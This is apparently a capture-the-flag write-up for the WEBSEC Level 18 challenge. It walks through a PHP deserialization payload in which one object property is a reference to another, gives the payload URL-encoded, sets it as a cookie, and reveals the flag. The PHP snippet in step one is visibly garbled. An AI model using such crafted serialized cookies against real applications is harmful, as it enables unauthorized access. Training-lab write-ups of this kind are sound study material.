WEBSEC Level 18

Challenge description

Can you please give it back? Thanks.

Walk through

STEP 1: Payload to point the obj −  > inputtothereferenceofobj->flag which in turn points to $flag

input = &obj −  > flag; echoserialize(obj); OUTPUT: O:8:"stdClass":2:{s:4:"flag";N;s:5:"input";R:2;} STEP 2: URL Encode the output OUTPUT: O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A4%3A%22flag%22%3BN%3Bs%3A5%3A%22input%22%3BR%3A2%3B%7D STEP 3: Insert the output as the obj cookie value OUTPUT: Here is your flag: WEBSEC{You_have_impressive_refrences.We'llcall_you_back.}.

Flag

FLAG: WEBSEC{You_have_impressive_refrences._We'll_call_you_back.}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.




OTHER POSTS